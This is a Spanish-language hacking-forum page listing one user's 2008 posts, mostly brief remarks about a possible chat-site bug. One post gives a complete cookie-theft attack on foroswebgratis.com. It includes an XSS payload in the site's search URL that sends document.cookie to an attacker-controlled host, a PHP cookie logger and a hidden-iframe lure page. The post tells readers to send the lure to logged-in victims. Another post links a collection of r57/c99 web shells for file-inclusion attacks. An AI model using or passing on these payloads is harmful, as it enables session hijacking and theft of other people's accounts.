Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - 6666

Páginas 1 ... 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24

#231

Nivel Web / Re: Bug Latinchat

21 Febrero 2008, 03:25 AM

no se seguire invstigando a ver si le saco provecho.saludos!

#232

se puede ejecutar vbs o javascript por ejemplo <script>document.location='lala.js'</script> mm no se que màs se puede hacer remoto ..
yo habia encontrado esto

http://foro.elhacker.net/index.php/topic,197376.0.html

#233

Nivel Web / Re: Bug Latinchat

20 Febrero 2008, 05:09 AM

Código [Seleccionar]

http://img411.¡mageshack.us/img411/7/dibujoaz4.jpg

Código [Seleccionar]

http://img411.¡mageshack.us/img411/2485/dibujozr6.jpg

#234

Nivel Web / Re: Bug Latinchat

18 Febrero 2008, 00:46 AM

Desmostrcion? no perdere tiempo en subir imagenes pero si podes ir a una sala de latinchat y donde escribis el mensaje pones <img src="URL"> y mostrara la imagen.

#235

Nivel Web / Re: Bug Latinchat

16 Febrero 2008, 16:31 PM

si .. la verdad que tmb conozco uno quizas sea el mismo .. se puede meter codigo en la ventana de chat .. quizas sea explotable. me pondre a ver que encuentro.yo pensaba que tenia html injection pero al final no le llegaba mi codigo al resto asi que me olvide.

salu2!

#236

Nivel Web / Re: [XSS] foroswebgratis

29 Enero 2008, 22:29 PM

woow! la verdad que me sirvio ese aporte.

#237

Nivel Web / Re: WordPress Last Referers HTML INJECTION Proof of Concept

28 Enero 2008, 14:37 PM

la verdad que si funciona!..pero que version? más datos exactamente.

#238

Nivel Web / [XSS] foroswebgratis

28 Enero 2008, 03:52 AM

en realidad el xss esta de hace bastante tiempo..siempre sta web tuvo multiples vulnerabilidades..la primero vez que encontre uno fue solo de accidente en el panel de administracion del foro ejempl: yo era admin-Foro.php?id_foro=1 cambia por 2 y ya estaba en la cuenta del foro numero 2..luego lo repararon..al poco tiempo habia encontrado otro..donde se podian borrar foros asi de la nada con solo dar click en un enlace..tmb lo arreglaron..y bue ahora este xss.

el error esta en el buscador de la web "home-buscador-run.php"

link:

Código [Seleccionar]

http://www.foroswebgratis.com/home-buscador-run.php?buscar=<img src=http: onerror=h=String.fromCharCode(**tu web encodeada**);document.location=h.concat(document.cookie) />

y aqui la tabla para encodearla:
son los de la columna code..

http://ttssh2.sourceforge.jp/manual/en/macro/appendixes/ascii.html

la web encodeada quedaria asi: http://www.misitio.com/s.php?c=

grabador de cookies(s.php):

Código [Seleccionar]

<?php
 $cookie = $_GET['c'];
 $ip = getenv ('REMOTE_ADDR');
 $date=date("m/d/Y g:i:s a");
 $referer=getenv ('HTTP_REFERER');
 $fl = fopen('log.txt', 'a');
 fwrite($fl, "\n".$ip.' :: '.$date."\n".$referer." :: ".$cookie."\n");
 fclose($fl);
?>

index.htm

Código [Seleccionar]

<iframe width="1" height="1" src="http://www.foroswebgratis.com/home-buscador-run.php?buscar=<img src=http: onerror=h=String.fromCharCode(**tu web encodeada**);document.location=h.concat(document.cookie) />" scrolling="no" name="hola" align="middle" border="0" frameborder="0">

y listo solo le mandas la web donde tengo el codigo de index.htm a la victima y robara su cookie.(tiene q estar logueada).lo ideal es ponerla como post en algun foro.

saludos!

publicado en : http://kasp.gratishost.com/xss.htm xD

#239

Nivel Web / Re: shell para rfi

28 Enero 2008, 03:16 AM

aca te dejo un rar con 66/67 shell no me acuerdo..estan la r57 la c99 entre otras..muy buena colección http://rapidshare.com/files/87180324/todas_las_shell.rar.html

Páginas 1 ... 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24

Test Foro de elhacker.net SMF 2.1